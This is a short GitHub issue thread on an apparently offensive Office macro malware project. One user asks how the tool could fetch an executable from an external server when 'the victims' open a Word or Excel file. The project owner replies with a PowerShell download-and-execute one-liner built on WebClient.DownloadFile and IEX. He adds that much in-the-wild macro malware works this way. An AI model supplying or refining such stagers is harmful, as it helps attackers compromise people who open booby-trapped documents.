Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

question #14

Open
lexlutorr opened this issue Feb 4, 2017 · 2 comments
Open

question #14

lexlutorr opened this issue Feb 4, 2017 · 2 comments

Comments

@lexlutorr
Copy link

i am trying to modify some things about your great work

wouldnt be better to download the exe file from a external server when the victims opens the word or excel ?

whats your opinion ?

@khr0x40sh
Copy link
Owner

That is a possibility.

It could be done very easily by just changing the powershell command to:

$(New-Object System.Net.WebClient).DownloadFile(src,dest); IEX dest

@khr0x40sh
Copy link
Owner

The issue is closed networks or if for any of the various reasons why the file couldn't be downloaded to the host.

But, again, what you have suggested could very well be done and is actually how quite a few of the in the wild macro malware work.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants